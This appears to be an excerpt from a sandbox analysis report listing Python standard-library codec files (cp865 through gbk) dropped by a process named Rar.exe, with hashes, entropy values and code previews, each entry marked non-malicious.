                                                                                                                                                                                                                                  SHA-512:B1C5797EC453694C0E285084F25B7825C13C59B2754DE58319745923784BB5105485883C6E8BDDFEAC3267EE8E9CDD34A76155282C2AD774CEF58FBC6AC476FC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP865.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp865',.. encode=Codec().encode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35094
                                                                                                                                                                                                                                  Entropy (8bit):4.600424943983017
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:lHLsuYDvRI0CnFdiaYzFFwrE0PXRN/h4wcuSMXY3uD8HtIMpW5449jBRWJn4bkV1:EVMYkjh4wVXYrxcHWJn4AVo0kQMy
                                                                                                                                                                                                                                  MD5:BE6B4AAAD297AE734F59800072CCAA30
                                                                                                                                                                                                                                  SHA1:6FE723B5DA8606EC26DC4523AA6F6EEEDACD16E0
                                                                                                                                                                                                                                  SHA-256:E3A033B3B790018A0A02E9F67A03530753C7FB5F94B6ABA84F5173D29FB389AE
                                                                                                                                                                                                                                  SHA-512:5E4B443A4778EAF7ECFA41E88CC259A6ABB2CCA0F578F7F72800C201D280C3AC033528EBF1043862DD64896DDEA444190FFF29C6EC7AEB6DE00B5E6C7EBAA86C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP866.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp866',.. encode=Codec().encode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33654
                                                                                                                                                                                                                                  Entropy (8bit):4.583176642392538
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:9XtKOodhREjkjh4wV+TRLMCXkWDoq4HWJn4AV+/S0sOkYmPr:UhR1jhJVBukWDo72BFEEN
                                                                                                                                                                                                                                  MD5:FC295CB9BF854E29A7EAB588DF20A662
                                                                                                                                                                                                                                  SHA1:F9D95ED00BBCB7CB89661A0BB93880BF08A70802
                                                                                                                                                                                                                                  SHA-256:4322E184D3C1DFA56EDB013E895CBFB71130E7846F8F56BCAFC4C0082373CB6A
                                                                                                                                                                                                                                  SHA-512:0167CC25A48AB6B09F08233CD51C8C622AF7014642BE6E9A72F37EA8C459F67CAE04DFED076E8148C512747CD775457442528F1963CE3F677FE3B5F45AD71C1B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP869.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp869',.. encode=Codec().encode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12902
                                                                                                                                                                                                                                  Entropy (8bit):4.624503078499216
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:KHhsuOTDvRHUrXPLouhIAs2+iRvskDCYnO00pC8i1bE:nThuhIAlX/H8iG
                                                                                                                                                                                                                                  MD5:5E2C1051F63CEB3600F970937C5FC6E4
                                                                                                                                                                                                                                  SHA1:062664CD22F5DC7A52E99EDCC9C5D356C2B6F841
                                                                                                                                                                                                                                  SHA-256:94179E22722674527BD56386B5E9DAC5427B0F55248D1AA63E204C105DA18D8B
                                                                                                                                                                                                                                  SHA-512:B6643A970DDF837CA060CB511C4AFA2E4224657450455BDAEF1980ED122791991FD13BAEFD56DE10A63FC1248EAB26478EE0B0B82B0E884FCEDD71D85DCB84F3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp874 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP874.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp874',..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13161
                                                                                                                                                                                                                                  Entropy (8bit):4.598690745287678
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:LHhsuOTDvRUUZkPS3RI4WcMHFVleIuiZdH77eDVqeOFf2nuS:eT5RIzc+gi72DcdFOnb
                                                                                                                                                                                                                                  MD5:3DAB3DF72E688978781C91CEA3285C4A
                                                                                                                                                                                                                                  SHA1:65664E8974B621B2C461774187C483ABFA0E735F
                                                                                                                                                                                                                                  SHA-256:5C42ADFEC39CF9D891FBB2ED19D882C6160A00B8487B7867F9E2296B9E2F491B
                                                                                                                                                                                                                                  SHA-512:7F940428049BCB0A95FC67FC178749B61ABF522646A68505B5B420718E5BD8ABBF6973B48CBF17DDA48179ABBA4D31F1E2169DBD5EFA33C044414A7A02673899
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp875 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp875',.. e
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1062
                                                                                                                                                                                                                                  Entropy (8bit):4.549007604127859
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:n5oqwOzff/XohaZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj93cJxFpz:Oqpwhat62VJjRU8njOxLnrxLbrLKmJx/
                                                                                                                                                                                                                                  MD5:70E562A99A8F07255F47C5F3C05518A5
                                                                                                                                                                                                                                  SHA1:F1F0A00A3238B19786D88B83F9FA57D043E2D0A9
                                                                                                                                                                                                                                  SHA-256:F917DB40F96F9F676E45FD9F1A7FA5D9BBB67A703BDF88B546CA4DA84C4905F5
                                                                                                                                                                                                                                  SHA-512:48C7BF7FDA257EC6ECC4421BFEF66E026C285DABB358ED41DDB6A9FFC6D73F61DA35F25A5622FC8D9D4D086D4BFA37E67A40810D39A6FA5F538F61427304298A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# cp932.py: Python Unicode Codec for CP932..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('cp932')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='cp932',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1062
                                                                                                                                                                                                                                  Entropy (8bit):4.532318933180232
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:no53qzqOzSf/XoxKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9+6cJxFV:otqzHzl62VJjRU8njOxLnrxLbrLK03Jd
                                                                                                                                                                                                                                  MD5:D85D0503255F9363D30F7B7AAD7355D4
                                                                                                                                                                                                                                  SHA1:DE0F8989F4BBE4CC9A91241DEED093BF259E2DC1
                                                                                                                                                                                                                                  SHA-256:DA13FD6F1BD7A1D3B48AED1FC75F7516D6A33814086CF971E030625590E9DDA0
                                                                                                                                                                                                                                  SHA-512:ED408E5A0B1042E0F1F94CF57171381F4B2A0491B9319BF2E0E02DB8B63BF342D7C4091B97DA8F9802B6EA0AE94EFFBE797F17E92F25E5F436BD88E11E4735B7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# cp949.py: Python Unicode Codec for CP949..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_kr, codecs..import _multibytecodec as mbc....codec = _codecs_kr.getcodec('cp949')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='cp949',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1062
                                                                                                                                                                                                                                  Entropy (8bit):4.541713907609811
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nqqqhOz6f/XoHKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ncJxFplR:qqVLj62VJjRU8njOxLnrxLbrLKWJxTz
                                                                                                                                                                                                                                  MD5:15D67984C7486D079058D4DBA07DDBBE
                                                                                                                                                                                                                                  SHA1:51AE51CD6ED99E4B594A5EFF1621308AA89DE532
                                                                                                                                                                                                                                  SHA-256:8FD6E86DFB38006E753B3B0301AA4B377C64C25F4EC9E6333FC99C3F06E90917
                                                                                                                                                                                                                                  SHA-512:46F3A96CE463669D8AD256C53C84EE201FB3D1EC0BEEEE55E622E75E93D1C9AA272BC0A414F3E65123C9BB1972BEEC9A8F43B2B9ACF849A2361DB188EE3F7836
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# cp950.py: Python Unicode Codec for CP950..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_tw, codecs..import _multibytecodec as mbc....codec = _codecs_tw.getcodec('cp950')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='cp950',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1090
                                                                                                                                                                                                                                  Entropy (8bit):4.603655042489424
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nsqVsOzff/XoL2KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9TcJxFplR:sqHwU62VJjRU8njOxLnrxLbrLKKJxTz
                                                                                                                                                                                                                                  MD5:F1FAE768C9FF8329D237608533530CED
                                                                                                                                                                                                                                  SHA1:3167902E4F9294DB74131FA2CE505E2F62B9C9B4
                                                                                                                                                                                                                                  SHA-256:78265BA431395662E7252A9B79BC2A75FFE438DB872B2CF1CBCFB243D83F0C87
                                                                                                                                                                                                                                  SHA-512:F726B7652435D174D1D84578A9278DD6B751B62CE231247CE4299860A5A4B2E1DB1D243B370625633D526278D30F2D05BBEBA9FC9E8312A103C455C65E802D68
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# euc_jis_2004.py: Python Unicode Codec for EUC_JIS_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('euc_jis_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_jis_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incrementa
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1090
                                                                                                                                                                                                                                  Entropy (8bit):4.624592201957947
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nrqLOzff/XoL1KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9IcJxFplR:rqAwl62VJjRU8njOxLnrxLbrLKLJxTz
                                                                                                                                                                                                                                  MD5:45A11BD69244CE2DCC3FF49206AD041B
                                                                                                                                                                                                                                  SHA1:C0FF2F0406F4158D26DA4FC850584D14764FCA55
                                                                                                                                                                                                                                  SHA-256:12CA22A7DB25D9EEEF9BF5FACDC5594E3165CCF451528D36E3B68A03989521AC
                                                                                                                                                                                                                                  SHA-512:06AFD42F84A6E83A55645C82A638A7AF6C545401570EB3871913060FCBCC8D348583F589E3133745A6584998493C35DE25F66336E7D4F48EAC1BFDD6C35D08D6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# euc_jisx0213.py: Python Unicode Codec for EUC_JISX0213..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('euc_jisx0213')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_jisx0213',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incrementa
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1066
                                                                                                                                                                                                                                  Entropy (8bit):4.531522047071056
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:n9qNOzff/XoLjKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9KcJxFplR:9q2wL62VJjRU8njOxLnrxLbrLKlJxTz
                                                                                                                                                                                                                                  MD5:0F2187EA4FC89DA2F54522EF29F58A7F
                                                                                                                                                                                                                                  SHA1:9DE39800CBBD630D7D4A1504C1A07F334EF3FAC5
                                                                                                                                                                                                                                  SHA-256:8927683A4234B936BE1935B8A799BE78520438BB5EA072499D51E7FE3D182987
                                                                                                                                                                                                                                  SHA-512:61BDFF78DE0A5E781C47F692620F7ACCD78AA006F530D478502A0905D51312B499E119F2EAA5524F2CEEF3CC4950F2865A1EFCFFF23BB4B9702579E0F3AEC97C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# euc_jp.py: Python Unicode Codec for EUC_JP..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('euc_jp')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_jp',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1066
                                                                                                                                                                                                                                  Entropy (8bit):4.509188463695804
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nSBqnChOzSf/Xoap0KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9DJFc3:EqnXzao62VJjRU8njOxLnrxLbrLK9J+3
                                                                                                                                                                                                                                  MD5:B6EF8BD54861FA5D1E0AFF68F50F2913
                                                                                                                                                                                                                                  SHA1:3CB1AC8785AF724B359BEFBFC3758D918067B77A
                                                                                                                                                                                                                                  SHA-256:03AFE0CF8020529EAD00A0EA26A7131D354994CD2352D42F9032216B3748EA91
                                                                                                                                                                                                                                  SHA-512:B8147C8F711BC1ACE96FB2769F79A54728F7A744FCCD3AA4BE1257E8F09507DEDE44CF9F5C1F089BB88F11A88D372874EB343BB48AFE639A6C7E8D27204BFA05
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# euc_kr.py: Python Unicode Codec for EUC_KR..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_kr, codecs..import _multibytecodec as mbc....codec = _codecs_kr.getcodec('euc_kr')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_kr',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1070
                                                                                                                                                                                                                                  Entropy (8bit):4.573121414528306
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nBMqgOz+f/Xo1GoKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9zcJxFpz:Wq5P1l62VJjRU8njOxLnrxLbrLKSJxTz
                                                                                                                                                                                                                                  MD5:40B18EE51A3241C53EF5CBC6C019997D
                                                                                                                                                                                                                                  SHA1:C4F48863B74CB56844A2CC68AF9629D9407B7CF7
                                                                                                                                                                                                                                  SHA-256:0D9C1DB7E2959E60E4F6CB4B97C884585668C55B48F2D9D715B2BDAF5E78C671
                                                                                                                                                                                                                                  SHA-512:12952CBED997D8E4F3608F2DA4BA0FAC468D7D48E7685556E3669AF18FC6C238688713894E4490AACDC05C253242ADE9C88E522DC45EB9D5827E29548108D5AE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# gb18030.py: Python Unicode Codec for GB18030..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gb18030')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gb18030',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. s
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1066
                                                                                                                                                                                                                                  Entropy (8bit):4.554621344303813
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nB6q6Oz+f/Xo11ZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9jcJxFpz:oq3P11t62VJjRU8njOxLnrxLbrLK+Jx/
                                                                                                                                                                                                                                  MD5:72F02C10927F33B52DF6549FF1F52E60
                                                                                                                                                                                                                                  SHA1:6C666F6A4C36D0C3CBD944216E170E26D7B5D91A
                                                                                                                                                                                                                                  SHA-256:2B5573EBF7FDC20DCF126633ADF0B7283C08629D36DBEFA669C985C9DDB98EA7
                                                                                                                                                                                                                                  SHA-512:F7F0D5C10490026F0809714BEED7CB2F5AB284C7BDC05BCBDF7C690A255DBA59F815B5524D88F5ED35CD6FD668C93695126EF7153CCBFA5B58BAA5E151839C51
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# gb2312.py: Python Unicode Codec for GB2312..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gb2312')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gb2312',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1054
                                                                                                                                                                                                                                  Entropy (8bit):4.504465163109839
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nBOEpqNOz+f/Xo1SKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9scJxFV:4Epq2P1k62VJjRU8njOxLnrxLbrLKPJd
                                                                                                                                                                                                                                  MD5:0D6CF4D6FFFB4B761BEBCEBC1D2C3CF3
                                                                                                                                                                                                                                  SHA1:64C7CD7A46E8CAE1CB9F0700035CA6BD2EC73C76
                                                                                                                                                                                                                                  SHA-256:9C7828E3B9661E39D4D75419A12B9D132FA9D0B4DAEC36F3DF51AD1C3A638DE3
                                                                                                                                                                                                                                  SHA-512:0F4F577C2FB46AB6B6D8DD6CFB5F89C8748F67E864D9AB6E3D92904BB0AE9EDB6239CABDF8A8F9B11238EEB60870EB819499B4A942E2D3B5CB7032F444246FCF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# gbk.py: Python Unicode Codec for GBK..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gbk')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gbk',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=Stre
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
